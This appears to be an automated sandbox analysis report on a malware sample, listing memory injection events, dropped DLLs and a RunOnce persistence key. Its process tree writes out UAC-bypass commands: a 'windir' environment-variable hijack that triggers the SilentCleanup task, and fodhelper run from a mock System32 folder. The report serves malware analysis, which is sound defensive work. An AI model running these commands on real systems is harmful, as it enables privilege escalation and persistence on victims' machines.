PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 748 wrote to memory of 2348	748	TapiUnattend.exe	25
PID 748 wrote to memory of 2348	748	TapiUnattend.exe	25
PID 748 wrote to memory of 2348	748	TapiUnattend.exe	25
PID 748 wrote to memory of 2348	748	TapiUnattend.exe	25
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 1496 wrote to memory of 2368	1496	Guqcvju_Signed_.exe	27
PID 2348 wrote to memory of 2408	2348	cmd.exe	28
PID 2348 wrote to memory of 2408	2348	cmd.exe	28
PID 2348 wrote to memory of 2408	2348	cmd.exe	28
PID 2348 wrote to memory of 2408	2348	cmd.exe	28
PID 2348 wrote to memory of 2420	2348	cmd.exe	29
PID 2348 wrote to memory of 2420	2348	cmd.exe	29
PID 2348 wrote to memory of 2420	2348	cmd.exe	29
PID 2348 wrote to memory of 2420	2348	cmd.exe	29
PID 2348 wrote to memory of 2432	2348	cmd.exe	30
PID 2348 wrote to memory of 2432	2348	cmd.exe	30
PID 2348 wrote to memory of 2432	2348	cmd.exe	30
PID 2348 wrote to memory of 2432	2348	cmd.exe	30
PID 2348 wrote to memory of 2520	2348	cmd.exe	32
PID 2348 wrote to memory of 2520	2348	cmd.exe	32
PID 2348 wrote to memory of 2520	2348	cmd.exe	32
PID 2348 wrote to memory of 2520	2348	cmd.exe	32
PID 748 wrote to memory of 2600	748	TapiUnattend.exe	33
PID 748 wrote to memory of 2600	748	TapiUnattend.exe	33
PID 748 wrote to memory of 2600	748	TapiUnattend.exe	33
PID 748 wrote to memory of 2600	748	TapiUnattend.exe	33

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1496 set thread context of 2368	1496	Guqcvju_Signed_.exe	27

Loads dropped DLL 6 IoCs

pid	Process
2368	ieinstal.exe
2368	ieinstal.exe
2368	ieinstal.exe
2368	ieinstal.exe
2368	ieinstal.exe
2368	ieinstal.exe

Executes dropped EXE 2 IoCs

pid	Process
2648	fodhelper.exe
2672	fodhelper.exe

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Guqc = "C:\\Users\\Admin\\AppData\\Local\\Guqc\\Guqc.hta"	Guqcvju_Signed_.exe

C:\Users\Admin\AppData\Local\Temp\Guqcvju_Signed_.exe
"C:\Users\Admin\AppData\Local\Temp\Guqcvju_Signed_.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Adds Run entry to start application
PID:1496
- C:\Windows\SysWOW64\TapiUnattend.exe
  "C:\Windows\System32\TapiUnattend.exe"
  2⤵
  PID:748
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Public\Natso.bat
    3⤵
    PID:2348
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:2408
  - - C:\Windows\SysWOW64\reg.exe
      reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
      4⤵
      Modifies registry key
      PID:2420
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      4⤵
      PID:2432
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Public\Runex.bat
    3⤵
    PID:2600
  - - C:\Windows \System32\fodhelper.exe
      "C:\Windows \System32\fodhelper.exe"
      4⤵
      Executes dropped EXE
      PID:2648
  - - C:\Windows \System32\fodhelper.exe
      "C:\Windows \System32\fodhelper.exe"
      4⤵
      Executes dropped EXE
      PID:2672
- C:\Program Files (x86)\internet explorer\ieinstal.exe
  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
  2⤵
  - Loads dropped DLL
  PID:2368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1496-124-0x0000000050480000-0x00000000504C0000-memory.dmp

Filesize
256KB

Download
memory/2368-129-0x0000000000660000-0x00000000007B6000-memory.dmp

Filesize
1.3MB

Download
memory/2368-127-0x0000000000660000-0x00000000007B6000-memory.dmp

Filesize
1.3MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads